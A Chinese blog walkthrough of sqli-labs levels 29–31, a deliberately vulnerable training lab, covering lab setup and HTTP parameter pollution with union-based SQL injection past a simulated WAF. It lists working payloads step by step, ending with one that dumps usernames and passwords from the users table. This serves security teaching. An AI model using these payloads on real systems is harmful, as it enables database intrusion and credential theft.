(手工)【sqli-labs29-31】参数污染、报错回显、WAF报错跳转、字符型注入

已于 2022-07-14 19:02:18 修改
阅读量480 收藏 4
点赞数
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库
于 2022-07-14 13:28:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125780997
版权

目录

推荐:

一、环境准备

1.1、简介:

1.2、配置:

二、(手工)SQL注入基本步骤:

三、Less29(GET-Error based -IMPIDENCE MISMATCH - Having a WAF in front of web application)

3.1、简介:(参数污染-报错回显-字符型注入-waf)

3.2、第一步:注入点测试

 3.3、第二步:分析过滤

3.4、第三步:判断字段数/回显位

3.5、第四步:暴库

3.6、第五步:爆表名

3.7、第六步:爆字段

3.8、第七步:爆数据

四、Less30(GET-Blind- IMPIDENCE MISMATCH - Having a WAF in front of web application)

4.1、简介:(参数污染-报错回显-字符型注入-waf)

4.2、利用:

五、Less31(GET-Blind- IMPIDENCE MISMATCH - Having a WAF in front of web application)

5.1、简介:(参数污染-报错回显-字符型注入-waf)

5.2、利用:

推荐:

【SQL注入-可回显】报错注入:简介、相关函数、利用方法https://blog.csdn.net/qq_53079406/article/details/125017089?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165777639916781647571668%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165777639916781647571668&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125017089-null-null.185%5Ev2%5Econtrol&utm_term=%E6%8A%A5%E9%94%99&spm=1018.2226.3001.4450

【SQL注入-无回显】时间盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165776808616780366570315%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165776808616780366570315&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165776808616780366570315%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165776808616780366570315&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450

【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501

【WAF绕过】SQL注入、文件上传、XSShttps://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450

一、环境准备

1.1、简介:

本身我们就已经安装了phpstudy

现在我们还需要安装jspstudy

达到双服务器效果

报错会跳转到另一个页面,在这里即jsp服务器中报错页面

也就是hacked.jsp后缀

其实也可以不搭建2个服务器

自己输入hacked.php也可以看见报错页面

1.2、配置:

第一步:下载

 第二步:安装

路径中不出现中文名

第三步:配置

要与之前安装的phpstudy端口不冲突,站点端口修改为不一样的

第四步:文件配置

将sqli-labs-master中的tomcat-files压缩包解压到WWW路径下

将URL路径修改为php服务下的相对应关卡路径


 

二、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析权限

第三步:判断字段数

第四步:爆数据库名

第五步:爆表名

第六步:爆字段名

第七步:爆数据

三、Less29(GET-Error based -IMPIDENCE MISMATCH - Having a WAF in front of web application)

3.1、简介:(参数污染-报错回显-字符型注入-waf)

请求方法:GET

方法:参数污染+闭合(字符型注入)+报错回显

3.2、第一步:注入点测试

输入?id=1 

 后面加上单引号发现报错了

说明是单引号闭合,即是字符型注入

且可利用报错回显

 加上hacked.php可以看见环境搭建好后的报错页面

不过搭建好后跳转的是hacked.jsp

用2个单引号前后闭合后

显示正常

 测试注入语句是否正常

?id=1'%26%26sleep(3)%26%26'1

转了3s

注入语句正常执行

 3.3、第二步:分析过滤

方法一:

考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)

或者全部替换(如果报错,不知道哪里被过滤了)

方法二:

获取源码进行白盒审计(最优)

方法三:

eg:输入?id=and or union select --+ updatexml # extractvalue(重要的都输进去)

看输入回显过滤语句的情况

貌似没啥过滤

3.4、第三步:判断字段数/回显位

?id=1' union select 1,2,3'

回显正常

 ?id=1' union select 1,2,3,4'

报错

 说明字段数为3

判断回显位

?id=-1' union select 1,2,3'

3.5、第四步:暴库

?id=1&id=-1' union select 1,2,database() --+

3.6、第五步:爆表名

?id=1&id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

 

3.7、第六步:爆字段

?id=1&id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

3.8、第七步:爆数据

?id=1&id=-1' union select 1,2,group_concat(username,'-',password) from security.users--+

四、Less30(GET-Blind- IMPIDENCE MISMATCH - Having a WAF in front of web application)

4.1、简介:(参数污染-报错回显-字符型注入-waf)

请求方法:GET

方法:参数污染+闭合(字符型注入)+报错回显

4.2、利用:

与Less29相比

就是将单引号闭合,改为了双引号

五、Less31(GET-Blind- IMPIDENCE MISMATCH - Having a WAF in front of web application)

5.1、简介:(参数污染-报错回显-字符型注入-waf)

请求方法:GET

方法:参数污染+闭合(字符型注入)+报错回显

5.2、利用:

与Less30相比

就是将多了一个括号闭合

黑色地带(崛起)
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【愚公系列】2023年05月 Web渗透测试之SQL注入sqli-labs、Less-29-31
时光隧道
08-02 4万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
SQLI-LABS环境搭建
12-12
SQLI-LABS环境搭建,里面包含PhpStudy2018和sqli-labs-ma
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs (less-29)
kukudeshuo的博客
03-13 671
sqli-labs (less-29) 进入29关,输入ID=1 输入 http://127.0.0.1/sql1/Less-29/?id=1' #回显错误 根据错误显示,判断闭合方式为’–+,但是这里不就跟less-1一模一样了吗,我们打开less-29的源文件看看,发现不只一个页面 我们输入 http://127.0.0.1/sql1/Less-29/login.php?id=1 输入 http://127.0.0.1/sql1/Less-29/login.php?id=1' 这里意思为
Kali-linux-2020 sqli-labs环境配置(含网上最全Less-29在Kali上的配置)
qq_43579362的博客
02-13 4734
一.检查必备环境是否安装及开启 kali-2020中apache2和mysql一般都自带有 1.打开apache2,终端输入sudo apache2 start,访问http://127.0.0.1,页面显示出来,说明启动成功 2.打开mysql,终端输入sudo mysql start,密码为空,直接按enter就登入,在输入set password for 'root'@'localhost...
SQLi LABS Less-29
热门推荐
wangyuxiang946的博客
08-16 1万+
29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可 在url中输入 1'and true-- a,源码中的SQL会拼接成下面这样 注释后面的内容不起作用,所以真正执行的SQL是这样的 and后面的true会使SQL恒成立,SQL正常查询出用户内容,并在页面显示出来 接下来再输入1'and false-- a,参数拼接到SQL中是下面这样的 由于注释后面的内容不起作用 ,所以真正执行的SQL应该是...
SQLi-LABS Less-29到Less-31
m0_64898960的博客
05-01 96
Less-29题目 Less-29的题目提到了WAF,看题目的意思应该是一个保护网站的东西 百度了一下 WAF就是Web Application Firewall,主要功能是拦截入侵尝试,比如SQL Injection, XSS, 路径遍历, 窃取敏感数据,CC攻击等。 就是说这个东西应该会拦截我们的SQL注入 开始尝试注入,发现一切太过简单… 百度过别人的做法之后,才知道这是双服务器,真正打开这题需要搭建jspstudy…但是比较麻烦… 也有简单的,正如其他博客写的一样,直接跳转到真正的注入页面…
sqli-labs靶场通关(Less-29~37)
qq_43381463的博客
01-29 100
sqli-labs靶场通关(Less-29~37)
Sqllibs-less29-31-WAF
Xor0ne
07-13 232
文章目录29.less29-Protection with WAF30.less30-Protection with WAF-Double Quotes31.less31-FUN with WAF 本文主要来自于:https://www.cnblogs.com/lcamry/category/846064.html 29.less29-Protection with WAF 参考链接:https://www.cnblogs.com/lcamry/p/5762952.html 首先先看下tomcat中的ind
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
SQLMAP脚本-sql-labs-Less-28-29
m0_69844818的博客
01-03 399
HTTP参数污染(HTTP Parameter Pollution) 攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击。这个labs是一个HTTP参数污染所以也简单写就需要&连接一些就行了,想了解这东西的去搜索吧,这里教的是怎么写脚本提供思路。使用双写union绕过,编写cx.py脚本。忒忒后端代码,比28简单更多。一样的使用28的脚本即可拿下。
【Amazon 实验③】Amazon WAF功能增强之追踪 Amazon WAF RequestID,排查误杀原因
宝耶需努力的技术分享博客
12-22 1424
本实验将介绍如何利用 Amazon Lambda@Edge,在 Amazon CloudFront 自定义错误页面 上展示每个由 Amazon WAF 返回的“403 Forbidden”错误的 Request ID。通过这个唯一的 WAF Request ID,网站运维工程师能够快速查询相应的 WAF 日志,找到误杀的原因。随后,可以配置 Scope-down 来修复误杀问题。
WAF总结
君莫hacker的博客
11-15 4560
WAF(Web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。这篇文章为大家介绍常用的绕WAF方法技巧。文章针对SQL注入来讲述如何绕过过滤规则
参数化导致的WAF绕过研究
C20220511的博客
07-08 595
在前面的两篇文章中,我们已经对编码和normalize这两个阶段可能造成的WAF绕过进行了分析。按照之前文章的分析结论,参数化是整个WAF工作过程中的又一个重要的阶段,在这个阶段中同样存在可以绕过WAF的思路。...
sql-labs 29 waf 绕过参数污染
qq_41619455的博客
08-27 1090
waf 绕过学习
国内外网络安全现状分析
最新发布
waitaikong_的博客
06-10 430
综上所述,无论是国内还是国际层面,网络安全都是一个复杂且不断演变的领域。面对日益严峻的网络安全威胁,需要政府、企业和个人共同努力,不断提升技术防护能力,加强法律法规建设,并通过国际合作共同应对挑战。同时,加强网络安全教育和人才培养也是保障网络安全的重要环节。在未来,随着技术的不断进步和国际合作的加深,我们有理由相信网络安全状况将会得到进一步的改善。
sqli-labs29
04-21
sqli-labs是一个用于学习和实践SQL注入的实验平台,它提供了一系列具有不同难度级别的SQL注入漏洞场景。sqli-labs29是其中的一个具体场景,它主要涉及到基于时间的盲注(Blind Time-Based Injection)。 在sqli-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值